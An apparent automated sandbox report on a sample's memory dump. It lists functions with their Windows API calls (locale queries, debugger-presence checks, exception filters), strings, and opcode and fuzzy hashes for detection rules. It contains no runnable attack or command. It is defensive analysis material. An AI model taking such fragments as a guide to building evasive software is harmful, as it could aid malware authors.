Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00159F32
IsDebuggerPresent.KERNEL32 ref: 00159FFE
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0015A017
UnhandledExceptionFilter.KERNEL32(?), ref: 0015A021

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b5d9ebc05aecf59cfd044625e18a40f48255aced21037eedabfd06a8d66f6fb2
Instruction ID: 2547ba113a064401359221d16f70fc1407897084afbe06ac27e2b69180abb2e9
Opcode Fuzzy Hash: b5d9ebc05aecf59cfd044625e18a40f48255aced21037eedabfd06a8d66f6fb2
Instruction Fuzzy Hash: 88311875D05218DBDB20DF64D9497CDBBB8AF18301F1041EAE91CAB290E7719B88DF45

Function 0016CB69 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0016CBBD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0016CC07
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0016CCCD

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 86ea75a57e6eb80f61268af13135e7fa165dbb95f3f078cf985f28b62482cc45
Instruction ID: b007f9fbe617fe72826d74e7c15a5c377510b54f71b3628aa66ab7737ae2b84c
Opcode Fuzzy Hash: 86ea75a57e6eb80f61268af13135e7fa165dbb95f3f078cf985f28b62482cc45
Instruction Fuzzy Hash: 3261B0719102079FDB289F68CC82BBA7BA9FF14340F1041B9ED5AC6185E734E9A1CBD4

Function 0015DE43 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0015DF3B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0015DF45
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0015DF52

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 22e5da1223d6d8d9ca9d3ace7055692b8f1aa99df7e37e8ad36a8d8b9d7c7e93
Instruction ID: d5c837cdd8c364881cb002ff0eb8365ead54b29657ee6ed3090912f2c6532726
Opcode Fuzzy Hash: 22e5da1223d6d8d9ca9d3ace7055692b8f1aa99df7e37e8ad36a8d8b9d7c7e93
Instruction Fuzzy Hash: 2331C474901228EBCB21DF24DC8979DBBB8BF18311F5041DAE91CAB290E7709B89CF45

Function 00169BD3 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d09475b039c52c82631f0a4df6520aab0a289af9eb9af710578f820d91884a
Instruction ID: fa7c7a4f9ce49eea7571b59ccbd917f203cc009e63cfbadffcec3e2ba00a96ec
Opcode Fuzzy Hash: 36d09475b039c52c82631f0a4df6520aab0a289af9eb9af710578f820d91884a
Instruction Fuzzy Hash: 4E4190B680421DAFDF20DF69CC89AAABBBDEB55304F1442D9E459D3201DB359E948F10

Function 0016CDBC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0016CE10

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 64d99b5129839d9c4cfb17f3eb73c754c44c672880e23dd37d23cddf8b95f342
Instruction ID: f870a39a811774cd05ae5ce9796c68fb8daaada5f48af8439915650ac2729fe9
Opcode Fuzzy Hash: 64d99b5129839d9c4cfb17f3eb73c754c44c672880e23dd37d23cddf8b95f342
Instruction Fuzzy Hash: E521D172A11206ABDB289B25DC42EBB7BBDEF55304F10407AFD41C6141EB36ED60CBA4

Function 0016CA43 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

EnumSystemLocalesW.KERNEL32(0016CB69,00000001,00000000,?,-00000050,?,0016D19A,00000000,?,?,?,00000055,?), ref: 0016CAB5

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 82a536de425e760bc21e8b769dbb010193ea17571e333d637e8eaa95a39626e7
Instruction ID: f8f2898c2fa32a8a9e67211b5cb2e6bd7c196a6389fa303f88638753d023d50f
Opcode Fuzzy Hash: 82a536de425e760bc21e8b769dbb010193ea17571e333d637e8eaa95a39626e7
Instruction Fuzzy Hash: 71114C372003099FDB18DF79DC9157AB791FF84368B14442DE98787A40E771B952CB80

Function 0016CFEB Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0016CD85,00000000,00000000,?), ref: 0016D017

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 19865628450626789516c43b2067456046e3b71dde972435785a7f7a83b4fab0
Instruction ID: 977006bafb6ae8683457e061ff8748d27196157776ee2743e5b52db1ee431a3a
Opcode Fuzzy Hash: 19865628450626789516c43b2067456046e3b71dde972435785a7f7a83b4fab0
Instruction Fuzzy Hash: E6F0F432B00116ABDB289A20DC06ABB7768EB80354F054428FC06A3180EB74FE52C6D0

Function 0016C951 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0016C9A5

Strings

utf8, xrefs: 0016C914

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 80ae82dcae8e5fc517c69941f23e8b5f46a5f242f6fbfc61a3df4addeb56b343
Instruction ID: 7c0d7f9d4baf5cdb63a82e8c3a44cdd2a2d6097da63ee92950f37c5c20f126ea
Opcode Fuzzy Hash: 80ae82dcae8e5fc517c69941f23e8b5f46a5f242f6fbfc61a3df4addeb56b343
Instruction Fuzzy Hash: E6F02232600205ABCB14AB74DC4AEFA37ACDF6A314F00017AB642D7282EB78AD45C790

Function 0016CADE Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

EnumSystemLocalesW.KERNEL32(0016CDBC,00000001,?,?,-00000050,?,0016D15E,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0016CB28

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9d0781d4292223f6bbc1e2c45c910bcab3949c27b491786db48591386c42b036
Instruction ID: 1cdafcdc7f98c8c782778e44c017e5ff4362090422bf38131dfd9592250160c0
Opcode Fuzzy Hash: 9d0781d4292223f6bbc1e2c45c910bcab3949c27b491786db48591386c42b036
Instruction Fuzzy Hash: 97F0F6763003085FDB146F79DC82A7A7B95EF813A8B05442EF9858BA80D7B1AC52DBD0

Function 00164A45 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0015EF59: EnterCriticalSection.KERNEL32(?,?,00163852,00000000,0017D6B0,0000000C,00163819,?,?,00164A0E,?,?,0016435E,00000001,00000364,?), ref: 0015EF68

EnumSystemLocalesW.KERNEL32(00164A38,00000001,0017D7D0,0000000C,00164E67,00000000), ref: 00164A7D

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 5b7a9b2922759f3dc02c7e2db4b9aad1a43d62ad6dc1edbfe369b1b0cc66c161
Instruction ID: fa7e45668af0c43a6df4daf502b7c6dc1bfd4e357fa32dab9588b23fc6ff76d1
Opcode Fuzzy Hash: 5b7a9b2922759f3dc02c7e2db4b9aad1a43d62ad6dc1edbfe369b1b0cc66c161
Instruction Fuzzy Hash: 35F06D72A40204EFD704DF98E842B9C7BF0EB58725F10811AF415EB7A0CBB58984CF90

Function 0016C9F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

EnumSystemLocalesW.KERNEL32(0016C951,00000001,?,?,?,0016D1BC,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0016CA2F

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 10bdd5250b23e46949773e2eaecaf3fe244b8f8209149050f4130fdde24537d8
Instruction ID: 570e469466efaeffd038b79384ff3e6ec0778743d529fdafd402c1fda0fa85c0
Opcode Fuzzy Hash: 10bdd5250b23e46949773e2eaecaf3fe244b8f8209149050f4130fdde24537d8
Instruction Fuzzy Hash: 40F0553630020957CB04AF75DC1567A7F90EFC2724B460058EA49CB640C771D882D7D0

Function 00164F6B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001633BD,?,20001004,00000000,00000002,?,?,001629BF), ref: 00164F9F

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c80d64fcb5f773785ca0329ac0611dd9c19e55c8aac3ab23a18ea4688dad52d4
Instruction ID: 26b6e7dcc74bd525f5518d43899036d6f50e5930f716c8663df1bf08041348c7
Opcode Fuzzy Hash: c80d64fcb5f773785ca0329ac0611dd9c19e55c8aac3ab23a18ea4688dad52d4
Instruction Fuzzy Hash: 30E04F31544218BBCF122F60DC09E9E7F26EF54760F014010FD1966121DB318971AAD5

Function 0015A082 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A08E,00159559), ref: 0015A087

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e66d7f9228f78b6ae3420c9b0dc2273f97e49ae748e6b2309fea2f6f86edbb76
Instruction ID: e1a58f12824da9d0afb157a52b8fdbcd839c2d28962cd2136ce508122a254b78
Opcode Fuzzy Hash: e66d7f9228f78b6ae3420c9b0dc2273f97e49ae748e6b2309fea2f6f86edbb76
Instruction Fuzzy Hash:

Function 0016D31C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0016D31C

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e8cfcbc7e9ed9162f33c2897da946bc9c55c471313c402f7321f95799745052f
Instruction ID: 70b361a846283c322a2cae9b71f264e47ea271e042d71a5a4cb732b5e1952557
Opcode Fuzzy Hash: e8cfcbc7e9ed9162f33c2897da946bc9c55c471313c402f7321f95799745052f
Instruction Fuzzy Hash: 2EA001706023118B9760CF35AB0960D7AB9EB45A917054069A51DC5970EB2489E0AA52

Function 00152090 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001520A5
std::_Lockit::_Lockit.LIBCPMT ref: 001520BF
std::_Lockit::~_Lockit.LIBCPMT ref: 001520E0
std::_Lockit::~_Lockit.LIBCPMT ref: 00152138
std::_Lockit::_Lockit.LIBCPMT ref: 0015217D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001521CE
__Getctype.LIBCPMT ref: 001521E5
std::_Facet_Register.LIBCPMT ref: 0015220F
std::_Lockit::~_Lockit.LIBCPMT ref: 00152228

Strings

bad locale name, xrefs: 00152237

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 2236780835-1405518554
Opcode ID: 973911da48d18be3082b565993af837b9630f95d6eb77fe3255ffc03487aef63
Instruction ID: c62d6fc5018bb95cba26c2ae5fa7d2ed4358a362021f6b14c9fdcd38d873a1ff
Opcode Fuzzy Hash: 973911da48d18be3082b565993af837b9630f95d6eb77fe3255ffc03487aef63
Instruction Fuzzy Hash: F441CF72508340CFC311DF28D881B5BBBE0BFA6711F45451CEDA89B251DB31E949CB92

Function 00159407 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0015940D
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0015941B
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0015942C
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0015943D

Strings

GetCurrentPackageId, xrefs: 00159415
GetTempPath2W, xrefs: 00159432
kernel32.dll, xrefs: 00159408
GetSystemTimePreciseAsFileTime, xrefs: 00159421

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 9c633b1c80ba7648f7c2959edd93f2b8ee0e07177309d4ad43d92bd63f3a2a01
Instruction ID: cc3048bf198f871bdc79e3daebe4b690415015cc4a103ed23f5eb5bad777fcc9
Opcode Fuzzy Hash: 9c633b1c80ba7648f7c2959edd93f2b8ee0e07177309d4ad43d92bd63f3a2a01
Instruction Fuzzy Hash: E3E0EC71995214AFC7009FB8BC4EC663EB8FB067027458616F419D2960DFB487C1DB95

Function 0015CDA8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 0015CEC7
___TypeMatch.LIBVCRUNTIME ref: 0015CFD5
_UnwindNestedFrames.LIBCMT ref: 0015D127
CallUnexpected.LIBVCRUNTIME ref: 0015D142

Strings

csm, xrefs: 0015CEFE
csm, xrefs: 0015CDE5
csm, xrefs: 0015CE52

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 2cad95b94324b9082ce7418d724635205b354a6b637fb68ddcae57da178d9c41
Instruction ID: 5ad6683ac7ea54c53ce221c70c5a247cbc90267268670e205bf8d71ef5322c4b
Opcode Fuzzy Hash: 2cad95b94324b9082ce7418d724635205b354a6b637fb68ddcae57da178d9c41
Instruction Fuzzy Hash: 72B14571800219EFDF29DFA4E8819AEBBB5EF14312F14415AFC216F242D731DA5ACB91

Function 0016830B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00168584

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 88e621ddae4d921a83ad829ef68cde42670b01cfcddede02bee5c9497323d0f6
Instruction ID: 910e79488093b312f26f88f4d54b4bbbb9b3d998c9fae4445e880b036196b4c0
Opcode Fuzzy Hash: 88e621ddae4d921a83ad829ef68cde42670b01cfcddede02bee5c9497323d0f6
Instruction Fuzzy Hash: D6B1C270A002499FDB15DF98CC80BBEBBB1BF59304F148258E9559B391CF709DA2CBA0

Function 0016FAD9 Relevance: 12.2, APIs: 8, Instructions: 248
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(00750560,00750560,?,7FFFFFFF,?,0016FDA9,00750560,00750560,?,00750560,?,?,?,?,00750560,?), ref: 0016FB7F
__alloca_probe_16.LIBCMT ref: 0016FC3A
__alloca_probe_16.LIBCMT ref: 0016FCC9
__freea.LIBCMT ref: 0016FD14
__freea.LIBCMT ref: 0016FD1A
__freea.LIBCMT ref: 0016FD50
__freea.LIBCMT ref: 0016FD56
__freea.LIBCMT ref: 0016FD66

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 2ddae219ad3fbfedad312da17c61f87d56f22937ee49a5874b2996002de595c5
